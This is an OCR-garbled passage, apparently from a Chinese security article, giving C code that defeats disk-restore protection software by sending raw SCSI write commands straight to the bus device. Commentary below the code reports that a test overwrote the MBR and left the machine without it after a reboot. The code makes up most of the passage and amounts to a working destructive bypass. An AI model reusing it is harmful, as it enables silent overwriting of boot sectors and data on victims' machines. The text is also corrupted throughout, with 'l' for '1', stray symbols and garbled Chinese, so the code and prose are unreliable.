do
{
BufferLength*=2;
Buffer = (PCHAR)malloc(BufferLength);
memset(Buffer, 0,BufferLength);
status =
(NtQueryDirectoryObject)(OpenObject, Buffer, BufferLength, FALSE, TRUE,
&uContext, &uResult);
}while(status == STATUS_MORE_ENTRIES | | status ==
STATUS_BUFFER_TOO_SMALL);
if (NT_SUCCESS(status))
pDirObjectinfo = (PDIRECTORY_BASIC_INFORMATION )Buffer;
//这里取第一个objectname
while(pDirObjectinfo->ObjectName. Length!=0 &&
pDirObjectinfo->ObjectTypeName. Length!=0)
/
i
wcscpy(ObjName, pDirObjectinfo->ObjectName. Buffer);
if (QueryDROSymbollinckName(ObjName)==1)
{
Result =1;
wcscpy(BusDevSymbolicName, L"\\\V \\"); wcscat(BusDevSymbolicName, ObjName); OutputDebugStringW(BusDevSymbolicName); break;
pDirObjectinfo++; ncount++;
memset(ObjName, 0, 0x100);
if (Buffer) free(Buffer); return Result;
}
ULONG bypasswrite_disk(HANDLE hDev, PVOID InDataBuf, ULONG LBA)
{
ULONG blockCount=l;
SCSI_PASS_THROUGH_DIRECT_ffITH_BUFFER sptdwb;
ULONG length=0, returnlength=0;
ULONG result; result = 1;
if (hDev==INVALID_HANDLE_VALUE) return result;
ZeroMemory(&sptdwb, sizeof(SCSI_PASS_THROUGH_DIRECT_WITH_BUFFER)); sptdwb. sptd. Length = sizeof(SCSI_PASS_THROUGH_DIRECT); sptdwb. sptd. PathId = 0; sptdwb. sptd. TargetId = 1; sptdwb. sptd. Lun = 0;
sptdwb. sptd. CdbLength = CDB12GENERIC_LENGTH; sptdwb. sptd. SenseInfoLength = sizeof(sptdwb. ucSenseBuf); sptdwb. sptd. DataIn = SCSI_I0CTL_DATA_0UT;
sptdwb. sptd. DataTransferLength = blockCount * 512; //这里读写一个扇
区
sptdwb. sptd. TimeOutValue = 5000;
sptdwb. sptd. DataBuffer = (VOID *) InDataBuf; //输入的 1^亡亡61,空间为 0x200
sptdwb. sptd. SenseInfoOffset =offsetof(SCSI_PASS_THROUGH_DIRECT_WITH_BUFFER, ucSenseBuf); sptdwb. sptd. Cdb[0] = SCSIOP_WRITE; sptdwb. sptd. Cdb[l] = 0x00;
sptdwb. sptd. Cdb[2] = (UCHAR)((LBA » 24) & OxFF); sptdwb. sptd. Cdb[3] = (UCHAR)((LBA » 16) & OxFF); sptdwb. sptd. Cdb[4] = (UCHAR)((LBA » 8) & OxFF); sptdwb. sptd. Cdb[5] = (UCHAR)((LBA » 0) & OxFF); sptdwb. sptd. Cdb[6] = 0x00;
sptdwb. sptd. Cdb[7] = (UCHAR)((blockCount » 8) & OxFF); sptdwb. sptd. Cdb[8] = (UCHAR)((blockCount » 0) & OxFF); sptdwb. sptd. Cdb[9] = 0x00;
length = sizeof(SCSI_PASS_THROUGH_DIRECT_ffITH_BUFFER); result =
DeviceIoContro1(hDev, IOCTL_SCSI_PASS_THROUGH_DIRECT, &sptdwb, length, &sptdwb, length, &returnlength, FALSE); if (result!=0)
{
OutputDebugString(^Passthough ok!〃);
CloseHandle(hDev); result=0; return result;
}
CloseHandle(hDev); return result;
}
int main(int argc, char* argv[])
{
ULONG result;
HANDLE hDevice;
char buffer[100]={0};
char outbuffer[200]={0};
ULONG StartLBA;
BYTE Inbuffer[0x200]={0};
printf(〃ByPass Disk Revert for test.... \nr/);
if (argc!=3)
{
printf (r/Usage: Passthough <StartLBA (x) >〈select {YES or NO} >\n");
}
if (!stricmp((char *)argv[2], "YES"))
{
if (GetFuncAddressFromNtdll())
{
result=GetBusDeviceName(); if (result)
{
//开始构造IOCTL_SCSI_PASS_THROUGH_DIRECT指令来穿透还原 hDevice =
CreateFileW (BusDevSymbolicName, GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_READ, NULL, OPEN_EXISTING, 0,0); if (hDevice)
{
sprintf (buffer, "%sOx%x", 〃获取总线设备符号连接的设备句 柄:",hDevice):
OutputDebugString(buffer);
//开始穿透还原测试 StartLBA = (ULONG)(atoi(argv[l])); printf(〃StartLBA=%d\n", StartLBA); memset(Inbuffer, 0x38, 0x200); printf("Start ByPass Write!\n"); result=bypasswrite_disk(hDevice, Inbuffer, StartLBA); if (!result)
{
sprintf(outbuffer,〃%s%d%s〃,〃 穿透磁盘成功,起始第 〈〃,StartLBA, 〃>个扇区被写入数据,自行查看!〃);
OutputDebugString(outbuffer); return 2;
}
}
}
}
}
return 0;
使用编写好的穿透还原的程序进行测试,环境:windows xp sp3+迅闪还原软件,对MBR整个扇区的内容进行写入测试,计算机重启之后,MBR丢失,效果如下:
这里 IOCTL_SCSI_PASS_THROUGH_DIRECT. IOCTL_SCSI_PASS_THROUGH 这两条指令是差不多,区别是如果不调用IOCTL_SCSI_PASS_THROUGH。是因为基本的微端口驱动访问内存,调用的CDB命令描述块可能需要直接访问内存使用 IOCTL_SCSI_PASS_THROUGH一DIRECT代替。我翻译至MSDN,有点拗口,我来解释一下:就是 如果008的命令描述块要求直接的是内存那么就用IOCTL_SCSI_PASS一THROUGH_DIRECT而不 是100^_5051_?八88_1^«^^如果你还不能理解,请去找一些8081相关资料阅读一下,所 以你用IOCTL_SCSI_PASS_THROUGH也可以,修改一下8口七4界匕8口七丄03七38肚{66因为 IOCTL_SCSI_PASS_THROUGH是没有使用到buffer的指针。网上某人说】扣011给出tophet. a 文档中给出的部分代码没用,好几个暗粧。拜托你自己再仔细看看8081的资料, 因此町0011留言狠狠的挖苦了他,有兴趣的读者可以去网上搜一下《豇呢0和訂呢3穿透 还原..》。还要说最重要的一句,使用者必须具有Adminstrator以上权限才可以使用SCSI 写入权限。 |
